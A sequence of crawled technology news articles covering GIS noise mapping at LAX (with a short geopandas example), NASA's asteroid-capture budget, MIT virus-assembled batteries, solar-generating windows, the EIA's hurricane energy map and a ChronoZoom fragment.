With ArcView AVENUE and a previous ANMP report as a template, Psomas programmers developed a structured query language that automated many of the complex steps involved in querying the database, and in identifying and quantifying spatial relationships. Wyle used the data and GIS application provided by Psomas to identify parcels within the contours; develop tables, reports and maps for noise mitigation plans; and calculate cost estimates and construction schedules -- all required for the annual report. Since neither Wyle nor NMB is a high-end GIS developer, the application enabled them to produce the ANMP report in considerably less time than with earlier methods. "What used to take a month," said Psomas Project Manager Matt Caraway, "now takes three to four days." "By automating much of the report," Adams added, "Psomas enabled all our GIS users to produce a relatively sophisticated product regardless of their skill levels."

Projected Superjets Noise

Psomas is also assisting LAX master planners Landrum and Brown in analyzing the projected noise from 550-passenger superjets now on the drawing boards. Airliners of the 21st century will have larger, more powerful engines and will need runways of two miles and longer. At this point, however, runway configurations for LAX are in the study phase. Final approval depends on the Los Angeles City Council and numerous federal and state regulatory agencies. Psomas' role in the project is similar to its work with the ANMP; the firm provides the database, and overlays the projected noise contours from Landrum and Brown onto the updated basemaps. Planners use the data to calculate the probable noise impact on surrounding communities.

GIS enabled LAWA not only to expedite the complex process of documenting the airport noise mitigation program, but, as Adams pointed out, it also enabled them "to get a better handle on the scope of the program," particularly in identifying and scheduling residences for sound-insulation construction.
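The core of that workflow, overlaying noise contours on a parcel basemap and pulling out the parcels inside each contour, is what GIS practitioners now call a spatial join. The sketch below shows roughly how it might look today with the open-source geopandas library rather than the ArcView/AVENUE tooling the project actually used; the file names and the "db_level" and "use_code" fields are hypothetical, and the `predicate` keyword assumes a recent geopandas release.

```python
import geopandas as gpd

# Hypothetical inputs: a parcel basemap and modeled 65/70/75 dB noise contours.
parcels = gpd.read_file("parcels.shp")          # one polygon per parcel, with a "use_code" field
contours = gpd.read_file("noise_contours.shp")  # contour polygons with a "db_level" field

# Tag each parcel with every contour it intersects, then keep the loudest band.
joined = gpd.sjoin(parcels, contours[["db_level", "geometry"]],
                   how="inner", predicate="intersects")
loudest = (joined.sort_values("db_level", ascending=False)
                 .groupby(level=0)
                 .first())

# Count qualifying residential parcels per contour band -- the kind of figure
# used to phase construction and estimate per-band insulation costs.
residential = loudest[loudest["use_code"].str.startswith("R")]
print(residential.groupby("db_level").size())
```

The same join, rerun after each update to the contour model or the parcel database, regenerates the tables that once took weeks to assemble by hand.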
The technology is currently helping LAX airport planners estimate with greater accuracy some of the environmental costs of accommodating the next generation of superjets.

Bill McGarigle is a writer specializing in communication and information technology.
<urn:uuid:48d03085-d204-47e3-91e6-a1657c71df5e>
CC-MAIN-2017-09
http://www.govtech.com/magazines/gt/Airport-Soundbytes.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00633-ip-10-171-10-108.ec2.internal.warc.gz
en
0.929275
1,439
3.09375
3
NASA's proposed $17.7 billion budget includes plans to capture and redirect an asteroid into orbit around Earth so astronauts can study it. Ultimately, the project looks to learn more about the makeup of asteroids in an attempt to protect the Earth from devastating collisions.

"Today, we unveil President Obama's Fiscal Year 2014 budget (PDF version) request for NASA -- a $17.7 billion investment in our nation's future," NASA Administrator Charles Bolden said today. "Our budget ensures the United States will remain the world's leader in space exploration and scientific discovery for years to come, while making critical advances in aerospace and aeronautics to benefit the American people."

The plan may get more attention, and possibly more congressional approval, because of an asteroid that entered Earth's atmosphere on Feb. 15, creating a fireball that streaked across the sky, releasing a high burst of energy and showering an area around Chelyabinsk, Russia, with meteorites.

The budget, which is flat compared to recent years, also includes funding to keep NASA on track to launch astronauts into space from U.S. soil by 2017. The budget also fully funds the building of a heavy-lift rocket and the Orion Multi-Purpose Crew Vehicle to carry astronauts into deep space. Orion is scheduled for an unmanned test flight in 2014, and a test of the rocket in 2017. NASA noted that any reduction to the proposed level of funding for the Commercial Crew program would result in a delay in launching Americans from U.S. soil, and would force the space agency to continue paying millions of dollars to the Russians to carry NASA astronauts into space.

NASA's 2014 budget proposal also includes continued funding for the International Space Station, and the continued operation of rovers and orbiters working on Mars, as well as planned future missions, such as a scheduled 2016 mission, called Insight, to examine why the Red Planet evolved so differently from Earth. NASA also is funding its continued work on the James Webb Space Telescope, which the space agency calls the next great observatory. With a planned launch in 2018, the telescope is geared to be the successor to the Hubble Space Telescope, searching for the first galaxies that formed in the early universe and hopefully giving scientists information about the Big Bang and the Milky Way.

However, the plans to capture an asteroid and move it into Earth's orbit may be one of NASA's more attention-grabbing missions. The plan includes finding a near-Earth asteroid that weighs about 500 tons but may be only 25 or 30 feet long. NASA did not say how soon this could be done, but said it would keep the agency within reach of its goal to visit an asteroid by 2025.

"This mission represents an unprecedented technological feat that will lead to new scientific discoveries and technological capabilities and help protect our home planet," Bolden said. "We will use existing capabilities, such as the Orion crew capsule and Space Launch System rocket, and develop new technologies like solar electric propulsion and laser communications -- all critical components of deep space exploration."

He also said NASA's plans, including the asteroid mission, rocket and robotic development, will help to create jobs for the next generation of scientists and engineers. "NASA's ground-breaking science missions are reaching farther into our solar system, revealing unknown aspects of our universe and providing critical data about our home planet and threats to it," Bolden said.
"Spacecraft are speeding to Jupiter, Pluto and Ceres while satellites peer into other galaxies, spot planets around other stars, and uncover the origins of the universe." Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is firstname.lastname@example.org. Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center. This story, "NASA budget includes plan to capture and redirect asteroid into Earth orbit" was originally published by Computerworld.
<urn:uuid:3b972be5-5a06-4c1a-923b-d6bc28d6f46d>
CC-MAIN-2017-09
http://www.itworld.com/article/2708925/hardware/nasa-budget-includes-plan-to-capture-and-redirect-asteroid-into-earth-orbit.html?page=2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170600.29/warc/CC-MAIN-20170219104610-00577-ip-10-171-10-108.ec2.internal.warc.gz
en
0.938572
826
3.109375
3
MIT Builds Batteries with Viruses

Normally, one would associate the word virus with something negative, whether it is a malfunctioning desktop computer or a sickness. However, researchers at the Massachusetts Institute of Technology have "trained" viruses in a lab to create a miniature battery. By manipulating a few genes within the virus, researchers were able to get the organism to grow and then assemble itself into a functional electronic device. They hope to be able to build a battery that could be as small as a grain of rice.

Two opposite electrodes -- or conductors -- called the anode and the cathode form the structure of a battery. These are separated by something called an electrolyte, a liquid or gel-like substance that contains ions and can conduct electricity. In the process created by MIT researchers, the viruses were engineered to create the anode by collecting cobalt oxide and gold. Since these viruses have a negative charge, they are then layered between oppositely charged synthetic polymers to create thin sheets. Batteries made with this process could store two to three times the energy of traditional batteries that size, meaning a longer-lasting charge.

While the researchers did not specify any early applications of the technology, it would likely first appear in Defense Department work. The project was funded by the Army Research Office, MIT said. The group's work is expected to appear in this week's issue of Science.
<urn:uuid:641cd169-857a-4422-b6a0-2272addf1624>
CC-MAIN-2017-09
https://betanews.com/2006/04/07/mit-builds-batteries-with-viruses/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171070.80/warc/CC-MAIN-20170219104611-00277-ip-10-171-10-108.ec2.internal.warc.gz
en
0.965223
288
3.90625
4
Manhattan has approximately 47,000 buildings with around 10.7 million windows, according to a 2013 estimate from The New York Times. Now imagine if just 1% -- or 107,000 -- of those windows could generate electricity through transparent photovoltaics. That's the idea behind solar power windows, and at least two companies are hoping to sell the technology to window manufacturers, saying once installed in a building the technology will pay for itself in about a year.

"If you look at the glass that's manufactured worldwide today, 2% of it is used for solar panels; 80% of it is used in buildings. That's the opportunity," said Suvi Sharma, CEO of solar panel maker Solaria. Solaria uses existing photovoltaic (PV) cells and slices them into 2.5mm strips. It then sandwiches those thin PV strips between glass layers in a window. "The way the human eye works, you don't even notice them," Sharma said.

An additional benefit? As the PV strips absorb light striking a building's window, they reduce the "solar heat gain coefficient"; in other words, the windows reduce the sunlight's effect on a building's internal air temperature and thereby lower air conditioning costs. Solaria is targeting its technology for windows that will be installed in newly constructed buildings.

Another company, SolarWindow Technologies, is pitching a different form of transparent PV cell technology for new construction, replacement windows and retrofits to existing windows. SolarWindow is using what it calls organic photovoltaics, which can vary in color and transparency. The company is planning to announce its product in a couple of weeks. SolarWindow CEO John Conklin said what sets his company's technology apart is its ease of integration. Because it's based on a PV film, it can be adhered to existing windows or incorporated into manufactured products relatively easily. Depending on the number of south-facing windows, which receive a majority of the sun's light, and the building's location in the U.S., SolarWindow's technology could provide from 20% to 30% of a skyscraper's energy needs, Conklin said.

Conklin would not disclose exactly which organic material SolarWindow uses. In 2013, however, Oxford University researchers released the results of a study on how neutral-colored, semi-transparent solar cells made of perovskite could be used in building and car windows to generate electricity. Perovskite is an oxide used in ceramic superconductors. The Oxford researchers said they could create transparent solar cells with comparatively high efficiencies. For example, the researchers were able to drive PV efficiencies up to 20% in a "remarkably short period of time" using a simple cell architecture. The university's work is being commercialized by Oxford Photovoltaics (a spin-out company), which is planning to produce attractively colored and semi-transparent glass, which works as a solar cell and could be integrated into the facades of buildings and windows.

Similarly, a team of researchers at Michigan State University (MSU) has developed a new type of transparent solar concentrator that, when placed over a window, creates solar energy. Called a transparent luminescent solar concentrator (TLSC), MSU's technology can not only be used on building windows but also on cell phones and any other device that has a clear, uncolored surface. Richard Lunt of MSU's College of Engineering said the key to the TLSC technology is that it's completely transparent.
"No one wants to sit behind colored glass," Lunt, an assistant professor of chemical engineering and materials science, said in a statement. "It makes for a very colorful environment, like working in a disco. We take an approach where we actually make the luminescent active layer itself transparent." MSU's solar harvesting technology uses small organic molecules developed by Lunt and his team to absorb specific nonvisible wavelengths of sunlight. One problem with MSU's technology is that more work is needed to improve its energy efficiency. Currently it is able to produce a solar conversion efficiency close to 1%, but the researchers hope to achieve efficiencies beyond 5% when fully optimized. Today, traditional solar power panels that reside in solar farms or on building rooftops can achieve a PV efficiency of about 15% to 20%. The efficiency rating refers to how much of the photons striking a solar cell are converted into energy. Solaria's solar window technology can achieve a solar effiency of about 8% to 10%. SolarWindow's Conklin would not disclose his company's technology efficiency rating, but did say it was less than standard PV panels. "Obviously when you're looking at absorbing visible light and it's transparent, it's not as efficient as an opaque panel," Conklin said. When it comes to solar windows, however, efficiency matters less than transparency, Conklin said. "When you're looking at transparent or clear photovoltaics, it's not necessarily a function of power conversion efficiency as it is about using the vast amount of space available for that tech," Conklin said. "We're making use of the space that right now is not available for solar energy production. Passive windows are turned into active energy generating windows." In other words, transparent solar PV is about not wasting perfectly good real estate in order to supplement a building's power requirements. The solar window technologies utilize varying methods of transmitting the energy that the PVs produce to a building's internal power infrastructure. Solaria, for example, hides its wiring in the window's frame, and the connectors are wired into a newly constructed building's electrical conduits. Those conduits lead to a central power inverter, which converts the solar windows direct current to alternating current that's usable in the electric grid. SolarWindow's technology can come with micro DC-to-AC power inverters, allowing the electricity to be used only in one room with a solar window. Alternately, it can be connected to a distributed microgrid inverter to power a single floor of a building or to a central inverter from which the entire building can draw power. Solaria is already piloting its windows in "a few" buildings and it is working on the first large-scale commercial projects in California and Europe, according to Sharma. Sharma did not disclose the projects. Solaria has also partnered with Tokyo-based Asahi Glass Co., a global glass manufacturer. Sharma said Asahi intends to sell both windows and a bamboo shade called Sudare with embedded solar cells from Solaria. "So we're enabling different glass and curtain wall providers in North America, Europe and Asia to provide products," Sharma said. Solar windows will cost about 40% more than conventional windows, but the ROI is achievable in under a year and there's big demand even though products have yet to ship, the manufacturers say. "It's actually very viable and will be even more viable as we approach our product launch," Conklin said. 
"It's in very high demand because right now skyscrapers... don't have a good way of offsetting energy through renewable energy generation." This story, "Solar windows can power buildings" was originally published by Computerworld.
<urn:uuid:3719d0ff-2897-4005-81c6-6a0a16524bec>
CC-MAIN-2017-09
http://www.itnews.com/article/2980236/sustainable-it/solar-windows-poised-to-change-the-way-we-power-buildings.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00097-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947762
1,496
3
3
Hurricane season is well in progress, and won’t wrap up until the end of November. And in looking back at last hurricane season, when Sandy rocked the East Coast, hundreds of lives were lost and countless people were displaced from their homes. But that's not all that was affected -- so was our energy infrastructure.

"High winds took down power lines. Rising seas flooded electric substations. Within 24 hours of Sandy’s landfall, more than 8 million utility customers lost power," wrote David Sandalow, former Assistant Secretary for Policy & International Affairs at the U.S. Department of Energy. "Fuel distribution networks were paralyzed. Critical terminals for petroleum and petroleum products were badly damaged. Many service stations lost power and couldn’t pump gas, leading to long gasoline lines in the New York/New Jersey area."

But this year's hurricane season may prove a bit different for the energy sector, thanks to a newly updated interactive map made available by the U.S. Energy Information Administration (EIA). Now, those in the energy industry may keep an extra close watch on the natural disasters as they unfold. What was an existing state map launched by the agency last September now includes more than 20 layers of GIS data to plot the nation’s energy infrastructure and resources. The data can be mashed up with real-time tropical storm and hurricane information from the National Hurricane Center, so resources like offshore production rigs, pipelines, coastal refineries, power plants, and energy import and export sites can be monitored as the severe weather occurs, according to the EIA. The National Hurricane Center, part of the National Oceanic and Atmospheric Administration, uses separate tools for tracking hurricane paths and carrying out public advisories.

EIA spokesman Mark Elbert said the agency’s existing state map served as a state energy portal on the geography of states, and incorporating the additional data layers from the National Hurricane Center leverages what the EIA had already developed with the state map. Previously when the EIA would update the map with hurricane information, there was no interactive component and information was not available in real time. When a hurricane or tropical storm would come through, updates would get posted periodically; however, there was always a delay in presenting the most up-to-date information.

When viewing the map after clicking the “full view” setting, users can see data layers such as information on active storms and the rank of their severity, recent storms, official hurricane warnings and wind speed. The data layers listed in a column next to the map allow users to check individual boxes to decide how many or how few of the data layers they wish to see at one time. “For example, you can click on the interstate pipelines, and it will give you a great deal of the pipelines, including the offshore ones out to the rigs so you can see the infrastructure there,” Elbert said.

Having access to data that mashes up energy resources with real-time storm information is particularly beneficial to those in the energy industry, said EIA spokeswoman Amy Sweeney, because it gives them a sense of how markets might be affected. Last year when Hurricane Isaac came up from the Gulf of Mexico and pushed its way up the Eastern Seaboard, several areas where natural gas gets produced lay in its path. As a result, the storm affected natural gas drilling platforms and processing plants.
Sweeney said when situations like these occur, processing plants are vulnerable to getting shut in, which could lead to a certain percentage of natural gas production capacity being curtailed. Storm destruction at or near natural gas production could therefore affect gas prices. Sweeney said similar situations occur with petroleum when hurricanes and tropical storms come across oil refineries. But by having information like what percentage of processing plants are out of commission, Sweeney said, “You can do some analysis that some customers in this area are going to be without power; without natural gas. It’s providing good baseline information."
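At its core, the value of the EIA mashup comes down to a simple geometric question: which energy assets sit inside a storm's forecast footprint? The Python sketch below shows a minimal version of that test using the shapely library; the wind-field polygon and facility coordinates are made up for illustration, whereas the real map pulls live geometries from National Hurricane Center feeds and EIA infrastructure layers.

```python
from shapely.geometry import Point, Polygon

# Hypothetical forecast wind-field polygon (lon, lat vertices) for an
# approaching Gulf storm, e.g. as might be read from an NHC shapefile.
wind_field = Polygon([(-95.0, 27.0), (-91.0, 27.5), (-90.0, 30.5), (-94.5, 30.0)])

# Hypothetical energy-infrastructure layer: facility name -> (lon, lat).
facilities = {
    "Gulf gas processing plant A": (-92.1, 29.3),
    "Offshore production rig B":   (-93.4, 28.1),
    "Coastal refinery C":          (-89.5, 30.2),
}

# Flag every facility whose location falls inside the forecast wind field.
exposed = [name for name, (lon, lat) in facilities.items()
           if wind_field.contains(Point(lon, lat))]

print("Facilities inside the forecast wind field:", exposed)
```

Analysts can then sum the capacity of the exposed facilities to gauge how much production might be shut in, which is the kind of baseline estimate Sweeney describes.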
<urn:uuid:60c49f0f-468e-4af4-93a8-142602adaa8a>
CC-MAIN-2017-09
http://www.govtech.com/Map-Mashes-Hurricane-Information-with-Energy-Infrastructure-Data.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00445-ip-10-171-10-108.ec2.internal.warc.gz
en
0.949569
819
2.609375
3
Status: “Ready for mass consumption,” but set for regular, consistent iterations. A by-product of Big Data, Big History is the study of time going all the way back to the Big Bang. Using a scale that begins 13.7 billion years ago, ChronoZoom breaks up history by thresholds that represent moments in time. Threshold 1, the Big Bang, is detailed with documents, images, and videos, known as artifacts, as well as a bibliography so the source of that information can be traced. Customizable narrations are especially useful add-ons for those in education or academia, allowing professors to provide their own interpretation of a window in time.
<urn:uuid:906cd24e-9b7f-4dab-a4da-a12ad1e10d62>
CC-MAIN-2017-09
http://www.cio.com/article/2368441/project-management/10-cool-projects-from-microsoft-s-research-arm.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00621-ip-10-171-10-108.ec2.internal.warc.gz
en
0.942641
141
3.046875
3